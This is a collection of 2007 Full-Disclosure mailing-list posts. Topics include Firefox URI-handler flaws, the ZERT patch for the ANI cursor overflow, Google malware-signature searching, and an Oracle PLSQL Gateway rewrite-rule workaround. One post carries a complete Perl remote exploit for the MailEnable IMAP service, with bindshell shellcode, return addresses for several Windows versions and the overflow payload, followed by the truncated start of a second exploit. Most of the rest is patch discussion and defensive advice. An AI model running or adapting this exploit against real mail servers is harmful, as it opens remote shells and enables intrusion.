Internet Explorer has received a lot of attention lately for the way it handles requests for external URIs Nate and I have warned that IE isn't the only browser with URI handling issues I've posted a PoC for remote command execution in Firefox (2.0.0.5), Netscape Navigator 9, and mozilla at: http://xs-sniper.com/blog/2007/07/24/remote-command-execution-in-firefox-2005/ These specific examples are built for WinXP SP2 WITH NO OTHER EXTERNAL EMAIL programs installed. Users with Outlook, notes, or other external mail programs installed may have had their URI handlers modified by the external program. Take some improperly registered URIs combined with a lack of sanitation by the browser and we've got problems its time to take another look at the URIs on your machine... -- Billy (BK) Rios http://www.xs-sniper.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] More URI Handling Vulnerabilites (FireFox Remote Command Execution)
These are also protocols recognized by firefox and acted upon. You are prompted about opening each with the applicable application. Be interesting if anyone can do something with it as well: htafile: htmlfile: asffile: exefile: urlfile: etc so far accepting the prompt doesn't invoke the application, just on quick testing though ;-) -- HASH(0x87b3770) HASH(0x8c4b628) http://tagline.hushmail.com/fc/Ioyw6h4eqxckDCeqoGcr84EDCOEAtr81ztpfUVca9W8VliCkAOgx6o/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] More URI Handling Vulnerabilites (FireFox Remote Command Execution)
Billy Rios wrote: I've posted a PoC for remote command execution in Firefox (2.0.0.5), Netscape Navigator 9, and mozilla at: http://xs-sniper.com/blog/2007/07/24/remote-command-execution-in-firefox-2005/ These specific examples are built for WinXP SP2 WITH NO OTHER EXTERNAL EMAIL programs installed. Users with Outlook, notes, or other external mail programs installed may have had their URI handlers modified by the external program. You must also upgrade to IE7, the examples will not work with IE6. You must have something registered to handle mailto: or Firefox won't even try. It doesn't matter what, though: IE7 appears to have introduced a change such that mailto:foo%00bar completely bypasses the registered protocol handler for mailto: (and a few other web protocols). You can follow Mozilla's progress dealing with this issue at https://bugzilla.mozilla.org/show_bug.cgi?id=389580 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] More information on ZERT patch for ANI 0day
On 4/3/07, Susan Bradley, CPA aka Ebitz - SBS Rocks [MVP] [EMAIL PROTECTED] wrote: And there's a patch for that Realtek already to go on the download site. (read the caveat section). So far all I've seen/heard is that one. Yes, I forgot to mention the patch. This is patching 7 graphics items not just the one. ...that's 6 more things the folks that throw at me from those Metasploit modules ;-) And of the seven vulnerabilities, the .ANI vulnerability is the only one I'm aware of that's being actively exploited. Four of the vulnerabilities are local privilege escalations that, while dangerous, aren't quite as dangerous as the ANI problem. While I agree that using the MS patch now that it's out is definitely recommended, I would argue that if the patch is causing problems that can't be worked around, using the ZERT patch in the meantime is definitely an option. And prior to the MS patch being released, the ZERT patch was a great resource to have out there. -- Jason 'XenoPhage' Frisvold [EMAIL PROTECTED] http://blog.godshell.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] More information on ZERT patch for ANI 0day
On 4/3/07, Susan Bradley, CPA aka Ebitz - SBS Rocks [MVP] [EMAIL PROTECTED] wrote: the community need that they are reacting to. Gadi and the crew work hard and have my respect for their efforts. Agreed. Previous patches worked as advertised with no adverse side effects here. If you are willing to evaluate the eEye patch, Zert's should be higher on your list as well since reportedly it works better than eEye's. eEye's patch only protects from attacks outside of %systemroot%. If an attacker can place a vulnerable file within %systemroot%, all bets are off. ZERT's patch, on the other hand, protects regardless of where the file is located. It specifically prevents the stack overflow condition by blocking chunks larger than 36 bytes from being copied. Regardless it's a moot point. The real patch is out. Install that one. It's on Windows update now. ISC is reporting problems with the Microsoft patch. A problem with the Realtek HD Audio Control Panel has been confirmed and patched by Microsoft. Other problems have been reported but no additional information on them has been released at this point., -- Jason 'XenoPhage' Frisvold [EMAIL PROTECTED] http://blog.godshell.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] More information on ZERT patch for ANI 0day
Hi, more information about the patch released April 1st can be found here: http://zert.isotf.org/ Including: 1. Technical information. 2. Why this patch was released when eeye already released a third party patch. Has anyone actually checked what this patch does? Who are ZERT and ISOTF respectively (About ISOTF at http://www.isotf.org/?page_value=0 says a lot...)? ...or is this an April Fool's joke? Cheers, Stefan. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] More information on ZERT patch for ANI 0day
On 4/3/07, Stefan Kelm [EMAIL PROTECTED] wrote: Has anyone actually checked what this patch does? Who are ZERT and ISOTF respectively (About ISOTF at http://www.isotf.org/?page_value=0 says a lot...)? ...or is this an April Fool's joke? The patch is 100% real and it is effective. I've seen it in action on testbeds. I can't claim to be an unbiased observer, as I helped some with the actual engineering process. There's a list of team members available: http://www.isotf.org/zert/members.htm ZERT includes a handful of the industry's most talented reverse engineering experts. You will know many of them if you follow security news regularly, and some of them whose names may not be familiar to you (like Michael Ligh and Gil Dabah) are nonetheless, master craftsmen of the trade we call security engineering. If I were running a security department, I'd hire them. You don't have to listen to me, though. For the cynics out there who are as comfortable vetting code yourself as listening to me (nothing wrong with that, either), there's source code in the downloadable ZIP. The code is missing for two components: 1. The patch ships the Microsoft Layer for Unicode (MSLU) in Unicows.dll which enables us to support platforms (Windows 95/98/Me) which are no longer officially supported by Microsoft. You can replace that DLL with your own copy of the MSLU library if you're concerned about its origins -- it hasn't been modified at all. 2. The patch sources static link to Gil Dabah's distorm disassembler library (distorm.lib) as well. That library is used to identify the vulnerable code within the affected DLL. You can build your own of that, from source, if you wish: http://www.ragestorm.net/distorm/ Don't worry... the patch doesn't bite. In either sense of the word. Regards, Matt Murphy ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] More information on ZERT patch for ANI 0day
Hardly. Don't remember that last Zero day in 2006 do you? http://www.eweek.com/article2/0,1895,2019162,00.asp The Zert folks have coded up zero day patches before (VML and WMF anyone?) and are folks actively out in the community. While I'm not ready yet to install third party patches on systems, I admire them for the community need that they are reacting to. Gadi and the crew work hard and have my respect for their efforts. If you are willing to evaluate the eEye patch, Zert's should be higher on your list as well since reportedly it works better than eEye's. Regardless it's a moot point. The real patch is out. Install that one. It's on Windows update now. Stefan Kelm wrote: Hi, more information about the patch released April 1st can be found here: http://zert.isotf.org/ Including: 1. Technical information. 2. Why this patch was released when eeye already released a third party patch. Has anyone actually checked what this patch does? Who are ZERT and ISOTF respectively (About ISOTF at http://www.isotf.org/?page_value=0 says a lot...)? ...or is this an April Fool's joke? Cheers, Stefan. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] More information on ZERT patch for ANI 0day
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 a/s/l? I currently reside in Fort Collins, Colorado and I obtained my PhD from Texas AM. - - neal On Tue, 03 Apr 2007 13:52:42 -0500 Susan Bradley, CPA aka Ebitz - SBS Rocks [MVP] [EMAIL PROTECTED] wrote: Hardly. Don't remember that last Zero day in 2006 do you? http://www.eweek.com/article2/0,1895,2019162,00.asp The Zert folks have coded up zero day patches before (VML and WMF anyone?) and are folks actively out in the community. While I'm not ready yet to install third party patches on systems, I admire them for the community need that they are reacting to. Gadi and the crew work hard and have my respect for their efforts. If you are willing to evaluate the eEye patch, Zert's should be higher on your list as well since reportedly it works better than eEye's. Regardless it's a moot point. The real patch is out. Install that one. It's on Windows update now. Stefan Kelm wrote: Hi, more information about the patch released April 1st can be found here: http://zert.isotf.org/ Including: 1. Technical information. 2. Why this patch was released when eeye already released a third party patch. Has anyone actually checked what this patch does? Who are ZERT and ISOTF respectively (About ISOTF at http://www.isotf.org/?page_value=0 says a lot...)? ...or is this an April Fool's joke? Cheers, Stefan. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 2.5 wpwEAQECAAYFAkYSqI0ACgkQDpFP8dW5K4Z38AP+MZBVOwDkBuCQmDQwK2d0jE0UwlgE 6u+o+4hTpViyu0XIaV4+ltElje+1YB/vuRAx5DFV/FmGbjnNH31JZJNNuk372BVEQEyy DsnD0zNUQd/SlMbaQ8KHaintbCFgSHp6wqbXEwRnFAfHy5Mn+1noDi2oVVdR1UEN65gJ nPqfE0k= =eXeS -END PGP SIGNATURE- -- Click to find great rates on home insurance, save big, shop here http://tagline.hushmail.com/fc/CAaCXv1QU9J8I3FnXUDPvvGq2HC7Zxhg/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] More information on ZERT patch for ANI 0day
And there's a patch for that Realtek already to go on the download site. (read the caveat section). So far all I've seen/heard is that one. This is patching 7 graphics items not just the one. ...that's 6 more things the folks that throw at me from those Metasploit modules ;-) Jason Frisvold wrote: On 4/3/07, Susan Bradley, CPA aka Ebitz - SBS Rocks [MVP] [EMAIL PROTECTED] wrote: the community need that they are reacting to. Gadi and the crew work hard and have my respect for their efforts. Agreed. Previous patches worked as advertised with no adverse side effects here. If you are willing to evaluate the eEye patch, Zert's should be higher on your list as well since reportedly it works better than eEye's. eEye's patch only protects from attacks outside of %systemroot%. If an attacker can place a vulnerable file within %systemroot%, all bets are off. ZERT's patch, on the other hand, protects regardless of where the file is located. It specifically prevents the stack overflow condition by blocking chunks larger than 36 bytes from being copied. Regardless it's a moot point. The real patch is out. Install that one. It's on Windows update now. ISC is reporting problems with the Microsoft patch. A problem with the Realtek HD Audio Control Panel has been confirmed and patched by Microsoft. Other problems have been reported but no additional information on them has been released at this point., ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] More information on ZERT patch for ANI 0day
Hi, more information about the patch released April 1st can be found here: http://zert.isotf.org/ Including: 1. Technical information. 2. Why this patch was released when eeye already released a third party patch. The newly discovered zero-day vulnerability in the parsing of animated cursors is very similar to the one previously discovered by eEye that was patched by Microsoft in MS05-002. Basically an anih chunk in an animated cursor RIFF file is read into a stack buffer of a fixed size (36 bytes) but the actual memory copy operation uses the length field provided inside the anih chunk.giving an attacker an easy route to overflow the stack and gain control of the execution of the process. With the MS05-002 patch, Microsoft added a check for the length of the chunk before copying it to the buffer. However, they neglected to audit the rest of the code for any other instances of the vulnerable copy routine. As it turns out, if there are two anih chunks in the file, the second chunk will be handled by a separate piece of code which Microsoft did not fix. This is what the authors of the zero-day discovered. Although eEye has released a third-party patch that will prevent the latest exploit from working, it doesn't fix the flawed copy routine. It simply requires that any cursors loaded must reside within the Windows directory (typically C:\WINDOWS\ or C:\WINNT\). This approach should successfully mitigate most drive-by's, but might be bypassed by an attacker with access to this directory. For this reason, ZERT is releasing a patch which addresses the core of the vulnerability, by ensuring that no more than 36 bytes of an anih chunk will be copied to the stack buffer, thus eliminating all potential exploit paths while maintaining compatibility with well-formatted animated cursor files. Gadi. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] More information on ZERT patch for ANI 0day
Gadi Evron wrote: Although eEye has released a third-party patch that will prevent the latest exploit from working, it doesn't fix the flawed copy routine. It simply requires that any cursors loaded must reside within the Windows directory (typically C:\WINDOWS\ or C:\WINNT\). This approach should successfully mitigate most drive-by's, but might be bypassed by an attacker with access to this directory. I'm thinking that an attacker with write access to %systemroot% probably has juicier, simpler targets to attack (which potentially let them run code in a higher security context) than animated cursors. - James. -- James (njan) Eaton-Lee | UIN: 10807960 | http://www.jeremiad.org All at sea again / And now my hurricanes Have brought down this ocean rain / To bathe me again https://www.bsrf.org.uk | ca: https://www.cacert.org/index.php?id=3 -- smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] More information on ZERT patch for ANI 0day
Gadi, Gadi Evron wrote: I'm thinking that an attacker with write access to %systemroot% probably has juicier, simpler targets to attack (which potentially let them run code in a higher security context) than animated cursors. http://www.milw0rm.com/exploits/3636 I'm struggling to see what direct relevance this has to what I just said... - James. -- James (njan) Eaton-Lee | UIN: 10807960 | http://www.jeremiad.org All at sea again / And now my hurricanes Have brought down this ocean rain / To bathe me again https://www.bsrf.org.uk | ca: https://www.cacert.org/index.php?id=3 -- smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] More information on ZERT patch for ANI 0day
Gadi, Gadi Evron wrote: It has relevance to what you replied to. No doubt - but unfortunately not the part of it that I was actually responding to; this isn't actually a reply to what I said, just a random vaguely topical link. - James. -- James (njan) Eaton-Lee | UIN: 10807960 | http://www.jeremiad.org All at sea again / And now my hurricanes Have brought down this ocean rain / To bathe me again https://www.bsrf.org.uk | ca: https://www.cacert.org/index.php?id=3 -- smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] More information on ZERT patch for ANI 0day
Gadi, Gadi Evron wrote: For a real current attack. Understandably. This is the attack which this thread is about, as indicated in the subject line of the e-mail. To recap, you used the phrase flawed copy routine. to refer to the fact that you could carry out an attack using this particular attack method by writing to typically C:\WINDOWS\ or C:\WINNT\. Again, to recap, my point was: an attacker with write access to %systemroot% probably has juicier, simpler targets to attack (which potentially let them run code in a higher security context) than animated cursors. Do you have any reply to make to what I actually *said*? - James. -- James (njan) Eaton-Lee | UIN: 10807960 | http://www.jeremiad.org All at sea again / And now my hurricanes Have brought down this ocean rain / To bathe me again https://www.bsrf.org.uk | ca: https://www.cacert.org/index.php?id=3 -- smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] More information on ZERT patch for ANI 0day
Well I did my patch and I'm giving it away to be modifiable by everyone out there. I did it for version 5.1.2600.2622 of user32.dll, English version not sure if that is the last version from M$ (with the way they handle patches you know you could miss one) anyway in any case I believe there is enough information in the sources if it needs a fix or... not if Microsoft really comes with a patch tomorrow. So far you don't have to be at the mercy of the chinese worm or evil random cracker. Let me know if is a POS if has bugs etc... Maybe is not needed by tomorrow but was already doing it. So if it helps.. Then great!! download binaries here http://aircash.sourceforge.net/micro-distro-src.zip and sources here http://aircash.sourceforge.net/micro-distro-bin.zip just my 2 cents Regards Waldo On 4/1/07, Gadi Evron [EMAIL PROTECTED] wrote: Hi, more information about the patch released April 1st can be found here: http://zert.isotf.org/ Including: 1. Technical information. 2. Why this patch was released when eeye already released a third party patch. The newly discovered zero-day vulnerability in the parsing of animated cursors is very similar to the one previously discovered by eEye that was patched by Microsoft in MS05-002. Basically an anih chunk in an animated cursor RIFF file is read into a stack buffer of a fixed size (36 bytes) but the actual memory copy operation uses the length field provided inside the anih chunk.giving an attacker an easy route to overflow the stack and gain control of the execution of the process. With the MS05-002 patch, Microsoft added a check for the length of the chunk before copying it to the buffer. However, they neglected to audit the rest of the code for any other instances of the vulnerable copy routine. As it turns out, if there are two anih chunks in the file, the second chunk will be handled by a separate piece of code which Microsoft did not fix. This is what the authors of the zero-day discovered. Although eEye has released a third-party patch that will prevent the latest exploit from working, it doesn't fix the flawed copy routine. It simply requires that any cursors loaded must reside within the Windows directory (typically C:\WINDOWS\ or C:\WINNT\). This approach should successfully mitigate most drive-by's, but might be bypassed by an attacker with access to this directory. For this reason, ZERT is releasing a patch which addresses the core of the vulnerability, by ensuring that no more than 36 bytes of an anih chunk will be copied to the stack buffer, thus eliminating all potential exploit paths while maintaining compatibility with well-formatted animated cursor files. Gadi. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] More information on ZERT patch for ANI 0day
Can someone point out What might one see or expect if exploited by this? Message: 14 Date: Sun, 1 Apr 2007 21:19:39 -0500 (CDT) From: Gadi Evron [EMAIL PROTECTED] Subject: [Full-disclosure] More information on ZERT patch for ANI 0day To: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk Message-ID: [EMAIL PROTECTED] Content-Type: TEXT/PLAIN; charset=US-ASCII Hi, more information about the patch released April 1st can be found here: http://zert.isotf.org/ Including: 1. Technical information. 2. Why this patch was released when eeye already released a third party patch. The newly discovered zero-day vulnerability in the parsing of animated cursors is very similar to the one previously discovered by eEye that was patched by Microsoft in MS05-002. Basically an anih chunk in an animated cursor RIFF file is read into a stack buffer of a fixed size (36 bytes) but the actual memory copy operation uses the length field provided inside the anih chunk.giving an attacker an easy route to overflow the stack and gain control of the execution of the process. With the MS05-002 patch, Microsoft added a check for the length of the chunk before copying it to the buffer. However, they neglected to audit the rest of the code for any other instances of the vulnerable copy routine. As it turns out, if there are two anih chunks in the file, the second chunk will be handled by a separate piece of code which Microsoft did not fix. This is what the authors of the zero-day discovered. Although eEye has released a third-party patch that will prevent the latest exploit from working, it doesn't fix the flawed copy routine. It simply requires that any cursors loaded must reside within the Windows directory (typically C:\WINDOWS\ or C:\WINNT\). This approach should successfully mitigate most drive-by's, but might be bypassed by an attacker with access to this directory. For this reason, ZERT is releasing a patch which addresses the core of the vulnerability, by ensuring that no more than 36 bytes of an anih chunk will be copied to the stack buffer, thus eliminating all potential exploit paths while maintaining compatibility with well-formatted animated cursor files. Gadi. -- Thank You Randall M = You too can have your very own Computer! Note: Side effects include: Blue screens; interrupt violation; illegal operations; remote code exploitations; virus and malware infestations; and other unknown vulnerabilities. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] More information on ZERT patch for ANI 0day
On Mon, 2 Apr 2007, James (njan) Eaton-Lee wrote: Gadi Evron wrote: Although eEye has released a third-party patch that will prevent the latest exploit from working, it doesn't fix the flawed copy routine. It simply requires that any cursors loaded must reside within the Windows directory (typically C:\WINDOWS\ or C:\WINNT\). This approach should successfully mitigate most drive-by's, but might be bypassed by an attacker with access to this directory. I'm thinking that an attacker with write access to %systemroot% probably has juicier, simpler targets to attack (which potentially let them run code in a higher security context) than animated cursors. http://www.milw0rm.com/exploits/3636 - James. -- James (njan) Eaton-Lee | UIN: 10807960 | http://www.jeremiad.org All at sea again / And now my hurricanes Have brought down this ocean rain / To bathe me again https://www.bsrf.org.uk | ca: https://www.cacert.org/index.php?id=3 -- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] More information on ZERT patch for ANI 0day
On Mon, 2 Apr 2007, James (njan) Eaton-Lee wrote: Gadi, Gadi Evron wrote: I'm thinking that an attacker with write access to %systemroot% probably has juicier, simpler targets to attack (which potentially let them run code in a higher security context) than animated cursors. http://www.milw0rm.com/exploits/3636 I'm struggling to see what direct relevance this has to what I just said... It has relevance to what you replied to. - James. -- James (njan) Eaton-Lee | UIN: 10807960 | http://www.jeremiad.org All at sea again / And now my hurricanes Have brought down this ocean rain / To bathe me again https://www.bsrf.org.uk | ca: https://www.cacert.org/index.php?id=3 -- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] More information on ZERT patch for ANI 0day
On Mon, 2 Apr 2007, James (njan) Eaton-Lee wrote: Gadi, Gadi Evron wrote: It has relevance to what you replied to. No doubt - but unfortunately not the part of it that I was actually responding to; this isn't actually a reply to what I said, just a random vaguely topical link. For a real current attack. - James. -- James (njan) Eaton-Lee | UIN: 10807960 | http://www.jeremiad.org All at sea again / And now my hurricanes Have brought down this ocean rain / To bathe me again https://www.bsrf.org.uk | ca: https://www.cacert.org/index.php?id=3 -- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] More information on ZERT patch for ANI 0day
On Mon, 2 Apr 2007, James (njan) Eaton-Lee wrote: Gadi, Gadi Evron wrote: For a real current attack. Understandably. This is the attack which this thread is about, as indicated in the subject line of the e-mail. To recap, you used the phrase flawed copy routine. to refer to the fact that you could carry out an attack using this particular attack method by writing to typically C:\WINDOWS\ or C:\WINNT\. Again, to recap, my point was: an attacker with write access to %systemroot% probably has juicier, simpler targets to attack (which potentially let them run code in a higher security context) than animated cursors. Do you have any reply to make to what I actually *said*? Not really, maybe othrs do. - James. -- James (njan) Eaton-Lee | UIN: 10807960 | http://www.jeremiad.org All at sea again / And now my hurricanes Have brought down this ocean rain / To bathe me again https://www.bsrf.org.uk | ca: https://www.cacert.org/index.php?id=3 -- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] More MailEnable exploits..
The following should somewhat specify any mention of unspecified in the following BID's, patched as some idiots cannot resist trying to own mailenable.com... BID: 21252 (maildisable-v3.pl) BID: 21492 (maildisable-v6.pl) --- ([EMAIL PROTECTED]) #!/usr/bin/perl # # maildisable-v3.pl # # Mail Enable Professional/Enterprise v2.32-4 (win32) remote exploit # by mu-b - Thu Nov 23 2006 # # - Tested on: Mail Enable Professional v2.32 (win32) - with HOTFIX # Mail Enable Professional v2.33 (win32) # Mail Enable Professional v2.34 (win32) # # what does this remind you off? # Note: timing is quite critical with this!!, so change $send_delay # if it doesn't work # use Getopt::Std; getopts('t:n:', \%arg); use Socket; # metasploit win32 bindshell port 1337 my $zshell_win32_bind = \x33\xc9\x83\xe9\xb0. \x81\xc4\xd0\xfd\xff\xff. \xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1d. \xcc\x32\x69\x83\xeb\xfc\xe2\xf4\xe1\xa6\xd9\x24\xf5\x35\xcd\x96. \xe2\xac\xb9\x05\x39\xe8\xb9\x2c\x21\x47\x4e\x6c\x65\xcd\xdd\xe2. \x52\xd4\xb9\x36\x3d\xcd\xd9\x20\x96\xf8\xb9\x68\xf3\xfd\xf2\xf0. \xb1\x48\xf2\x1d\x1a\x0d\xf8\x64\x1c\x0e\xd9\x9d\x26\x98\x16\x41. \x68\x29\xb9\x36\x39\xcd\xd9\x0f\x96\xc0\x79\xe2\x42\xd0\x33\x82. \x1e\xe0\xb9\xe0\x71\xe8\x2e\x08\xde\xfd\xe9\x0d\x96\x8f\x02\xe2. \x5d\xc0\xb9\x19\x01\x61\xb9\x29\x15\x92\x5a\xe7\x53\xc2\xde\x39. \xe2\x1a\x54\x3a\x7b\xa4\x01\x5b\x75\xbb\x41\x5b\x42\x98\xcd\xb9. \x75\x07\xdf\x95\x26\x9c\xcd\xbf\x42\x45\xd7\x0f\x9c\x21\x3a\x6b. \x48\xa6\x30\x96\xcd\xa4\xeb\x60\xe8\x61\x65\x96\xcb\x9f\x61\x3a. \x4e\x9f\x71\x3a\x5e\x9f\xcd\xb9\x7b\xa4\x37\x50\x7b\x9f\xbb\x88. \x88\xa4\x96\x73\x6d\x0b\x65\x96\xcb\xa6\x22\x38\x48\x33\xe2\x01. \xb9\x61\x1c\x80\x4a\x33\xe4\x3a\x48\x33\xe2\x01\xf8\x85\xb4\x20. \x4a\x33\xe4\x39\x49\x98\x67\x96\xcd\x5f\x5a\x8e\x64\x0a\x4b\x3e. \xe2\x1a\x67\x96\xcd\xaa\x58\x0d\x7b\xa4\x51\x04\x94\x29\x58\x39. \x44\xe5\xfe\xe0\xfa\xa6\x76\xe0\xff\xfd\xf2\x9a\xb7\x32\x70\x44. \xe3\x8e\x1e\xfa\x90\xb6\x0a\xc2\xb6\x67\x5a\x1b\xe3\x7f\x24\x96. \x68\x88\xcd\xbf\x46\x9b\x60\x38\x4c\x9d\x58\x68\x4c\x9d\x67\x38. \xe2\x1c\x5a\xc4\xc4\xc9\xfc\x3a\xe2\x1a\x58\x96\xe2\xfb\xcd\xb9. \x96\x9b\xce\xea\xd9\xa8\xcd\xbf\x4f\x33\xe2\x01\xf2\x02\xd2\x09. \x4e\x33\xe4\x96\xcd\xcc\x32\x69; # ff e4 - jmp %esp my @offsets = ( \xf8\xfe\x5a\x7c, # Win2K Server SP4 KERNEL32.dll 5.0.2195.7099 \xe2\x48\xe6\x77, # WinXP SP0 KERNEL32.dll 5.1.2600.0 \x06\x38\xe6\x77, # WinXP SP1 KERNEL32.dll 5.1.2600.11061 \xd9\xae\x80\x7c, # WinXP SP2 KERNEL32.dll 5.1.2600.21802 \x62\x51\xeb\x77, # Win2K3 SP1 KERNEL32.dll 5.2.3790.18300 \xef\xbe\xad\xde # DoS ); print_header; my $target; my $offset; if (defined($arg{'t'})) { $target = $arg{'t'} } if (defined($arg{'n'})) { $offset = $arg{'n'} } if (!(defined($target))) { usage; } if (!(defined($offset))) { $offset = 0; } if ($offset $#offsets) { print(only .($#offsets+1). targets known!!\n); exit(1); } else { $offset = $offsets[$offset]; } my $imapd_port = 143; my $send_delay = 2; my $NOP = 'A'; my $START_PAD = 3; if (connect_host($target, $imapd_port)) { print(- * Connected\n); send(SOCKET, 1 LOGIN {1022}\r\n, 0); sleep(2); print(- * Sending padding payload\n); # first recv 0x3fe, NULL tricks strncpy... send(SOCKET, \x00.($NOP x 1020), 0); sleep($send_delay); print(- * Sending payload\n); $buf = ($NOP x $START_PAD).# padding \xee\xaf\xdc\xba. # dummy var_0 \xef\xbe\xad\xde. # EBP $offset.# EIP \xdc\xa3\x19\x03. # dummy arg_0 \xdc\xa3\x19\x03 v2.33 ($NOP x 4). # NOPS $zshell_win32_bind. # hellcode $NOP x (0x3fd-$START_PAD-16-length($zshell_win32_bind)-5); send(SOCKET, $buf, 0); sleep($send_delay); print(- * Successfully sent payload!\n); print(- * nc .$target. 1337 for shell...\n); } sub print_header { print(MailEnable Pro v2.32-4 (HOTFIX) remote exploit\n); print(by: [EMAIL PROTECTED]\n\n); } sub usage { print(qq(Usage: $0 -t hostname -t hostname: hostname to test -n num : return addy offset number )); exit(1); } sub connect_host { ($target, $port) = @_; $iaddr = inet_aton($target) || die(Error: $!\n); $paddr = sockaddr_in($port, $iaddr) || die(Error: $!\n); $proto = getprotobyname('tcp') || die(Error: $!\n); socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die(Error: $!\n); connect(SOCKET, $paddr) || die(Error: $!\n); return(1338); } #!/usr/bin/perl # # maildisable-v6.pl # # Mail Enable Professional =v2.35 (win32) remote exploit # by mu-b - Tue Dec 5 2006 # # - Tested on: Mail Enable Professional v2.35 (win32) # # Note: timing
[Full-disclosure] more on browser trust
http://www.gnucitizen.org/blog/xssing-the-lan-4 -- pdp (architect) http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] more than just malware.. [was: Google Malware Search]
Guys, HD and the guys at Websense are obviously very cool for noting this Google hacking technique and exploiting it (HD publicly). Still, this thing can be used far and wide.. a lot more than just for known signatures of malware, etc. I was lucky enough to be playing with this for a bit before Websense went completely public and HD made it public, so I came up with a few more possibilities... Also, I have cool friends who played with this and gave me some ideas too! :) A few examples I gave in my blog on this, inspired by Websense and then HD's new tool, is to look for other signatures rather than just known stuff. For example, looking for UPX packers results in almost 10K suspect samples: signature: 4550 UPX1 The PE binary part, and then the UPX section named UPX1. Trying other combinations, possibly along with the filetype: feature, can result in many interesting findings other than known malware. How many packers and protection systems are out there for starters? Also, tried any checks for open directory indexes? :) I wrote more about this on my blog at securiteam: http://blogs.securiteam.com/index.php/archives/513 Gadi. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] More on the workaround for the unpatched Oracle PLSQL Gateway flaw
According to Oracle, the workaround I posted, that prevents exploitation of a critical vulnerability that Oracle has so far failed to fix, breaks certain applications that sits atop their PLSQL Gateway. Though my workaround prevents exploitation of the critical flaw and thus protects vulnerable systems against attack, Oracle has made no effort to furnish me, or anyone else for that matter, with more information on how the workaround breaks some of their applications. As such, improving the workaround so it doesn't break these few applications has been mildy annoying. But I think I've tracked it down. The workaround as is RewriteEngine on RewriteCond %{QUERY_STRING} ^.*\).*|.*%29.*$ RewriteRule ^.*$ http://127.0.0.1/denied.htm?attempted-attack RewriteRule ^.*\).*|.*%29.*$ http://127.0.0.1/denied.htm?attempted-attack will trigger if a right facing bracket ')' appears in the PATH_INFO or _anywhere_ in the query string. Thus, if the value of a query string parameter contains a bracket the workaround will trigger. As far as the flaw is concerned, we need only concern ourselves with brackets that appear in the query string parameter name - not in the value for the parameter name. As such, if we modify the workaround to RewriteEngine on RewriteCond 